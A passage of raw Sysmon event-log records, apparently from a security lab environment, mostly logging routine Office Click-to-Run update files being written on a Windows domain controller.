Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\ClientARMRefer2019_eula.txt2021-04-20 14:54:15.175 11241100x800000000000000064494Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:15.175{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\client_eula.txt2021-04-20 14:54:15.018 11241100x800000000000000064493Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:15.018{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\Client2019_eula.txt2021-04-20 14:54:15.018 11241100x800000000000000064492Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:15.018{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\System\vcruntime140.dll2021-04-20 14:54:15.018 11241100x800000000000000064491Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:15.018{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\CERTINTL.DLL2021-04-20 14:54:15.018 11241100x800000000000000064490Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:15.018{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\System\vcruntime140_1.dll2021-04-20 14:54:15.018 23542300x800000000000000049480Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:15.557{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F5E27EB36985C0F2FE0B6BAF325FEB09,SHA256=0432F0AFEBB56A4632E9289471AB832E9ACDE4C4CC65352FE22CAF6DDA6E3115,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000064627Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:16.971{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\1033\GrooveIntlResource.dll2021-04-20 14:54:16.971 11241100x800000000000000064626Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:16.971{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\en\SpreadsheetIQ.ExcelAddin.Resources.dll2021-04-20 14:54:16.971 11241100x800000000000000064625Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:16.971{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\1033\STSUPLD.INTL.DLL2021-04-20 14:54:16.971 11241100x800000000000000064624Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:16.971{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\en\SpreadsheetIQ.Diagram.Resources.dll2021-04-20 14:54:16.971 11241100x800000000000000064623Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:16.971{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\en\Common.PasswordManager.Resources.dll2021-04-20 14:54:16.956 11241100x800000000000000064622Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:16.956{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\en\Common.FileUtils.Resources.dll2021-04-20 14:54:16.956 11241100x800000000000000064621Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:16.956{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\en\Common.ExcelServices.Resources.dll2021-04-20 14:54:16.956 11241100x800000000000000064620Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:16.956{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\en\Common.ClientConfiguration.Resources.dll2021-04-20 14:54:16.956 11241100x800000000000000064619Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:16.956{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\en\Common.AuditItems.Resources.dll2021-04-20 14:54:16.956 11241100x800000000000000064618Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:16.956{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\en\SpreadsheetIQ.ExcelServices.Resources.dll2021-04-20 14:54:16.956 11241100x800000000000000064617Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:16.924{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\System\MSMAPI\1033\MSMAPI32.DLL2021-04-20 14:54:16.924 11241100x800000000000000064616Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:16.924{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\mfc140u.dll2021-04-20 14:54:16.924 11241100x800000000000000064615Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:16.924{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\1033\msointl30.dll2021-04-20 14:54:16.924 11241100x800000000000000064614Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:16.924{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\JitV.dll2021-04-20 14:54:16.924 11241100x800000000000000064613Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:16.924{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Integration\Integrator.exe2021-04-20 14:54:16.924 11241100x800000000000000064612Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:16.924{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Interceptor.dll2021-04-20 14:54:16.924 11241100x800000000000000064611Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:16.924{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\vcruntime140_1.dll2021-04-20 14:54:16.924 11241100x800000000000000064610Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:16.924{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\msvcr120.dll2021-04-20 14:54:16.924 11241100x800000000000000064609Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:16.924{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\vccorlib140.dll2021-04-20 14:54:16.924 11241100x800000000000000064608Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:16.924{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\ucrtbase.dll2021-04-20 14:54:16.924 11241100x800000000000000064607Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:16.924{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\vcruntime140.dll2021-04-20 14:54:16.909 11241100x800000000000000064606Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:16.909{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\msvcp140.dll2021-04-20 14:54:16.909 11241100x800000000000000064605Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:16.909{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\msvcp120.dll2021-04-20 14:54:16.909 11241100x800000000000000064604Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:16.909{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\api-ms-win-core-xstate-l2-1-0.dll2021-04-20 14:54:16.909 11241100x800000000000000064603Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:16.909{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSACCESS.EXE2021-04-20 14:54:16.909 11241100x800000000000000064602Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:16.909{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\IVY.DLL2021-04-20 14:54:16.909 11241100x800000000000000064601Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:16.909{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\TRANSLAT\ESEN\MSB1ESEN.DLL2021-04-20 14:54:16.909 11241100x800000000000000064600Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:16.909{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\EduWorks Data Streamer Add-In\DataStreamerLibrary.dll2021-04-20 14:54:16.909 11241100x800000000000000064599Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:16.909{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\ACCOLK.DLL2021-04-20 14:54:16.909 11241100x800000000000000064598Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:16.909{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ACCWIZ.DLL2021-04-20 14:54:16.909 11241100x800000000000000064597Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:16.878{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\CLVIEW.EXE2021-04-20 14:54:16.862 11241100x800000000000000064596Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:16.862{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Document.dll2021-04-20 14:54:16.862 11241100x800000000000000064595Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:16.862{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Document.XmlSerializers.dll2021-04-20 14:54:16.862 11241100x800000000000000064594Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:16.862{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exe2021-04-20 14:54:16.862 11241100x800000000000000064593Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:16.862{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.NetFX40.exe2021-04-20 14:54:16.831 11241100x800000000000000064592Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:16.831{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\1033\MSSOAPR3.DLL2021-04-20 14:54:16.831 11241100x800000000000000064591Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:16.831{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\GRAPH.EXE2021-04-20 14:54:16.831 11241100x800000000000000064590Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:16.831{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\FSTOCK.DLL2021-04-20 14:54:16.831 11241100x800000000000000064589Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:16.831{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\FPLACE.DLL2021-04-20 14:54:16.831 11241100x800000000000000064588Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:16.831{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\Office Setup Controller\Office.en-us\BRANDING.DLL2021-04-20 14:54:16.831 11241100x800000000000000064587Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:16.831{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\lync.exe2021-04-20 14:54:16.831 11241100x800000000000000064586Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:16.831{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\NAMECONTROLSERVER.EXE2021-04-20 14:54:16.831 11241100x800000000000000064585Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:16.831{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\api-ms-win-core-timezone-l1-1-0.dll2021-04-20 14:54:16.831 11241100x800000000000000064584Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:16.831{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\api-ms-win-core-synch-l1-2-0.dll2021-04-20 14:54:16.831 11241100x800000000000000064583Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:16.831{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\api-ms-win-core-processthreads-l1-1-1.dll2021-04-20 14:54:16.831 11241100x800000000000000064582Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:16.831{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\api-ms-win-core-localization-l1-2-0.dll2021-04-20 14:54:16.456 10341000x800000000000000064581Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:16.721{A7A01FEF-B626-607E-0D00-00000000BB01}10084160C:\Windows\system32\svchost.exe{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000064580Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:16.456{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\api-ms-win-core-file-l2-1-0.dll2021-04-20 14:54:16.456 11241100x800000000000000064579Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:16.456{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\api-ms-win-core-file-l1-2-0.dll2021-04-20 14:54:16.456 11241100x800000000000000064578Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:16.378{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\msvcp120.dll2021-04-20 14:54:16.378 11241100x800000000000000064577Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:16.378{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\api-ms-win-core-file-l2-1-0.dll2021-04-20 14:54:16.378 11241100x800000000000000064576Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:16.378{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\api-ms-win-core-file-l1-2-0.dll2021-04-20 14:54:16.378 11241100x800000000000000064575Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:16.378{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSOXEV.DLL2021-04-20 14:54:16.378 11241100x800000000000000064574Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:16.378{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\vcruntime140.dll2021-04-20 14:54:16.378 11241100x800000000000000064573Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:16.378{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 